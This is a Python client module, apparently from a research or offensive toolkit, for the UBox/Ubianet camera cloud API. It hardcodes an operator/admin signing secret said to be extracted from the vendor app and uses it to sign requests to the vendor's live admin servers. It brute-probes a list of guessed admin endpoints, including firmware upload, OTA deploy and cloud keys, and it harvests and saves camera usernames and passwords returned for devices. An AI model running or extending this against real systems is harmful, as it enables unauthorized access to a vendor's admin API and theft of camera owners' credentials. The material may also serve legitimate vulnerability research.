"""UBox cloud API client — authenticate, list devices, check firmware, etc."""

import base64
import hashlib
import hmac
import json
import time
import urllib.error
import urllib.request

from utils.log import log, C_SUCCESS, C_ERROR, C_INFO, C_TRAFFIC, C_IMPORTANT

# Value sent in the X-UbiaAPI-CallContext header of every request.
_CALL_CONTEXT = "source=app&app=ubox&ver=1.1.360&osver=14"
# Timeout, in seconds, applied to every HTTP request made by this module.
_HTTP_TIMEOUT = 15

# ─── OAM (operator/admin) endpoint signing ───────────────────────
# Hardcoded secret extracted from com/http/OamHttpClient.java:28
OAM_BASE_URLS = [
    "https://oam.ubianet.com/api",
    "https://dev.ubianet.com/oam/api",
]
OAM_APPID = "30001"
OAM_CLIENT_ID = ""  # empty in app code; may need to be set per-deployment
OAM_SECRET = "2894df25f8f740dff5266bc155c662ca"


def oam_sign(body_str, ts_ms, appid=OAM_APPID, client_id=OAM_CLIENT_ID, secret=OAM_SECRET):
    """
    Reproduce com.http.Encryption.Hmac:
        sig_str = "<ts_ms>:<appid>:<client_id>:<body_str>"
        hmac    = HmacSHA1(sig_str.utf8, secret.bytes)
        result  = hex(hmac)

    Returns the lowercase hex digest as a string.
    """
    sig_str = f"{ts_ms}:{appid}:{client_id}:{body_str}"
    h = hmac.new(secret.encode("utf-8"), sig_str.encode("utf-8"), hashlib.sha1)
    return h.hexdigest()


def oam_post(endpoint, data, base_url=None):
    """
    POST to an OAM endpoint with the OAM-SIGN header set.

    Tries each known OAM base URL in order (or only `base_url` when given)
    and returns the first successfully decoded JSON payload. If every base
    fails, returns a dict describing the LAST failure:
    {"error": <HTTP status or message>, "base": <base url>[, "body": <text>]}.
    """
    body_str = json.dumps(data)
    body = body_str.encode("utf-8")
    ts_ms = str(int(time.time() * 1000))
    # Pass the module globals explicitly: oam_sign's defaults were bound at
    # definition time, so relying on them would sign with stale values if
    # OAM_APPID / OAM_CLIENT_ID / OAM_SECRET are reassigned per deployment,
    # while the headers below would carry the new ones.
    sign = oam_sign(body_str, ts_ms, appid=OAM_APPID,
                    client_id=OAM_CLIENT_ID, secret=OAM_SECRET)

    headers = {
        "Content-Type": "application/json",
        "OAM-SIGN": sign,
        "OAM-APPID": OAM_APPID,
        "CLIENT-ID": OAM_CLIENT_ID,
        "timestamp": ts_ms,
        "X-UbiaAPI-CallContext": _CALL_CONTEXT,
    }

    bases = [base_url] if base_url else OAM_BASE_URLS
    last_err = None
    for b in bases:
        url = f"{b}/{endpoint}"
        log(f"OAM: POST {url}", C_INFO)
        # Log the same prefix that was actually signed (body truncated).
        log(f" sign-str = {ts_ms}:{OAM_APPID}:{OAM_CLIENT_ID}:{body_str[:80]}", C_INFO)
        log(f" OAM-SIGN = {sign}", C_INFO)
        req = urllib.request.Request(url, data=body, method="POST", headers=headers)
        try:
            with urllib.request.urlopen(req, timeout=_HTTP_TIMEOUT) as resp:
                payload = json.loads(resp.read().decode("utf-8"))
                log(f"OAM: {json.dumps(payload, indent=2)[:400]}", C_TRAFFIC)
                return payload
        except urllib.error.HTTPError as e:
            body_text = e.read().decode("utf-8", errors="replace")[:400]
            log(f"OAM: HTTP {e.code} from {b}: {body_text}", C_ERROR)
            last_err = {"error": e.code, "body": body_text, "base": b}
        except Exception as e:
            # Best-effort probe: any other failure (DNS, TLS, timeout, bad
            # JSON) is recorded and the next base URL is tried.
            log(f"OAM: error from {b}: {e}", C_ERROR)
            last_err = {"error": str(e), "base": b}
    return last_err or {"error": "all OAM bases failed"}


def oam_fuzz(endpoints):
    """
    Hit a list of candidate OAM endpoints with empty bodies and report
    which ones return non-404 responses (i.e. exist).

    Returns a dict with keys "hits" (list of per-endpoint dicts), "404s",
    "errors" and "tried" (counters). Non-404 errors are counted in "errors"
    and also recorded as hits; payloads without an "error" key are recorded
    as hits with their code/msg/data. Non-dict payloads are not recorded.
    """
    results = {"hits": [], "404s": 0, "errors": 0, "tried": 0}
    for ep in endpoints:
        results["tried"] += 1
        r = oam_post(ep, {})
        if isinstance(r, dict):
            err = r.get("error")
            if err == 404:
                results["404s"] += 1
            elif err is not None:
                results["errors"] += 1
                results["hits"].append({"endpoint": ep, "error": err,
                                        "body": r.get("body", "")[:200]})
            else:
                # Real JSON came back (msg=success or msg=fail with code)
                results["hits"].append({"endpoint": ep, "code": r.get("code"),
                                        "msg": r.get("msg"), "data": r.get("data")})
                log(f"OAM-FUZZ: ✓ {ep} -> code={r.get('code')} msg={r.get('msg')}", C_IMPORTANT)
    log(f"OAM-FUZZ done: {len(results['hits'])} hits / {results['tried']} tried "
        f"({results['404s']} 404s, {results['errors']} errors)", C_SUCCESS)
    return results


# Candidate OAM endpoints — confirmed in source + admin guesses
OAM_ENDPOINT_GUESSES = [
    # Confirmed in OamHttpClient.java
    "lgc/bind_err",
    "app/push_channel_reg",
    # Common admin patterns to probe
    "oam/users", "oam/user/list", "oam/user/info",
    "oam/devices", "oam/device/list", "oam/device/info",
    "oam/firmware", "oam/firmware/list", "oam/firmware/upload",
    "oam/ota", "oam/ota/list", "oam/ota/deploy", "oam/ota/push",
    "oam/config", "oam/cloud/config", "oam/cloud/keys",
    "oam/stats", "oam/dashboard", "oam/system",
    "oam/logs", "oam/audit", "oam/security",
    "user/list", "user/info", "user/all",
    "device/list", "device/info", "device/all",
    "firmware/list", "firmware/all", "firmware/latest",
    "ota/list", "ota/all", "ota/deploy",
    "admin/users", "admin/devices", "admin/firmware",
    "admin/config", "admin/system", "admin/stats",
    "stats", "dashboard",
    "system/info", "system/version",
    "lgc/bind_ok", "lgc/list", "lgc/info",
    "app/version", "app/config",
    "push/list", "push/send", "push/all",
]


def _is_success(result):
    """Return True when `result` is a JSON object whose "msg" is "success"."""
    return isinstance(result, dict) and result.get("msg") == "success"


def hash_password(password):
    """
    Hash a password the way the login request expects it.

    HMAC-SHA1 of the UTF-8 password with an EMPTY key, base64-encoded, then
    "+" -> "-", "/" -> "_" and "=" -> "," substituted.
    """
    h = hmac.new(b"", password.encode("utf-8"), hashlib.sha1).digest()
    b64 = base64.b64encode(h).decode("utf-8")
    return b64.replace("+", "-").replace("/", "_").replace("=", ",")


def api_post(base_url, endpoint, data, token=None):
    """
    POST `data` as JSON to `{base_url}/{endpoint}` and return the decoded
    JSON response.

    When `token` is truthy it is sent in the X-Ubia-Auth-UserToken header.
    Never raises for request failures: an HTTP error yields
    {"error": <status>, "body": <first 500 chars>}, any other exception
    yields {"error": <message>}.
    """
    url = f"{base_url}/{endpoint}"
    body = json.dumps(data).encode("utf-8")
    req = urllib.request.Request(url, data=body, method="POST")
    req.add_header("Content-Type", "application/json")
    req.add_header("X-UbiaAPI-CallContext", _CALL_CONTEXT)
    if token:
        req.add_header("X-Ubia-Auth-UserToken", token)
    try:
        with urllib.request.urlopen(req, timeout=_HTTP_TIMEOUT) as resp:
            return json.loads(resp.read().decode("utf-8"))
    except urllib.error.HTTPError as e:
        return {"error": e.code, "body": e.read().decode("utf-8", errors="replace")[:500]}
    except Exception as e:
        return {"error": str(e)}


def login(cfg):
    """
    Log in with cfg["api_email"] / cfg["api_password"] via "v3/login".

    On success stores the token in cfg["api_token"], calls cfg.save() and
    returns True. Returns False (after logging) when credentials are unset,
    the API does not report success, or the response carries no token.
    """
    if not cfg["api_email"] or not cfg["api_password"]:
        log("API: set api_email and api_password first", C_ERROR)
        return False

    hashed = hash_password(cfg["api_password"])
    data = {
        "account": cfg["api_email"],
        "password": hashed,
        "app": "ubox",
        "app_version": "1.1.360",
        "device_type": 1,
        "lang": "en",
        "brand": "Python",
        "device_token": "none",
        "regid_jg": "fail",
        "regid_xm": "fail",
        "regid_vivo": "fail",
    }

    log(f"API: logging in as {cfg['api_email']}...", C_INFO)
    result = api_post(cfg["api_base"], "v3/login", data)

    # A "success" reply without a usable data/Token is treated as a failed
    # login instead of raising KeyError/TypeError.
    payload = result.get("data") if _is_success(result) else None
    token = payload.get("Token") if isinstance(payload, dict) else None
    if not token:
        log(f"API: login failed: {json.dumps(result)[:200]}", C_ERROR)
        return False

    cfg["api_token"] = token
    log(f"API: login OK — token={cfg['api_token'][:20]}...", C_SUCCESS)
    # Only note that app_config is present; its contents are not stored here.
    app_cfg = payload.get("app_config", {})
    if app_cfg:
        log("API: leaked app_config keys extracted", C_IMPORTANT)
    cfg.save()
    return True


def devices(cfg):
    """
    Fetch the account's device list via "user/device_list".

    Logs every device; for each device that reports both cam_user and
    cam_pwd, stores its uid and credentials in cfg and saves (so the last
    such device wins). Returns the device list, or [] when not logged in or
    the API does not report success.
    """
    if not cfg["api_token"]:
        log("API: login first", C_ERROR)
        return []

    result = api_post(cfg["api_base"], "user/device_list", {}, cfg["api_token"])
    if not _is_success(result):
        log(f"API: {json.dumps(result)[:300]}", C_ERROR)
        return []

    # Tolerate a missing or non-object "data" field rather than raising.
    payload = result.get("data")
    if not isinstance(payload, dict):
        payload = {}
    devs = payload.get("list") or []
    fw = payload.get("firmware_ver", [])
    log(f"API: {len(devs)} device(s), firmware: {fw}", C_SUCCESS)
    for d in devs:
        uid = d.get("device_uid", "?")
        name = d.get("name", "?")
        cu = d.get("cam_user", "")
        cp = d.get("cam_pwd", "")
        model = d.get("model_num", "?")
        bat = d.get("battery", "?")
        log(f" [{uid}] {name} model={model} bat={bat}%", C_TRAFFIC)
        if cu and cp:
            log(f" LEAKED CREDS: {cu} / {cp}", C_IMPORTANT)
            cfg["device_uid"] = uid
            cfg["device_cam_user"] = cu
            cfg["device_cam_pwd"] = cp
            cfg.save()
    return devs


def check_firmware(cfg):
    """
    Query "user/qry/device/check_version/v3" for cfg["device_uid"], reporting
    host/wifi version "0.0.0.1". Logs and returns the raw API result, or
    None when no token or device uid is configured.
    """
    if not cfg["api_token"] or not cfg["device_uid"]:
        log("API: login and get devices first", C_ERROR)
        return None

    result = api_post(cfg["api_base"], "user/qry/device/check_version/v3", {
        "device_uid": cfg["device_uid"],
        "host_version": "0.0.0.1",
        "wifi_version": "0.0.0.1",
        "is_lite": False,
        "zone_id": 2,
    }, cfg["api_token"])

    log(f"API firmware: {json.dumps(result, indent=2)}", C_TRAFFIC)
    return result


def device_services(cfg):
    """
    Query "user/qry/device/device_services" for cfg["device_uid"]. Logs
    (truncated) and returns the raw API result, or None when no token or
    device uid is configured.
    """
    if not cfg["api_token"] or not cfg["device_uid"]:
        log("API: login and get devices first", C_ERROR)
        return None

    result = api_post(cfg["api_base"], "user/qry/device/device_services",
                      {"device_uid": cfg["device_uid"]}, cfg["api_token"])
    log(f"API services: {json.dumps(result, indent=2)[:600]}", C_TRAFFIC)
    return result


def raw_request(cfg, endpoint, data=None):
    """
    POST `data` (an empty object when omitted/falsy) to an arbitrary
    `endpoint` using the stored token. Logs (truncated) and returns the raw
    API result, or None when not logged in.
    """
    if not cfg["api_token"]:
        log("API: login first", C_ERROR)
        return None

    log(f"API: POST {endpoint}", C_INFO)
    result = api_post(cfg["api_base"], endpoint, data or {}, cfg["api_token"])
    log(f"API: {json.dumps(result, indent=2)[:800]}", C_TRAFFIC)
    return result


def families(cfg):
    """Shortcut for raw_request(cfg, "user/families")."""
    return raw_request(cfg, "user/families")


def device_list_v2(cfg):
    """Shortcut for raw_request(cfg, "v2/user/device_list")."""
    return raw_request(cfg, "v2/user/device_list")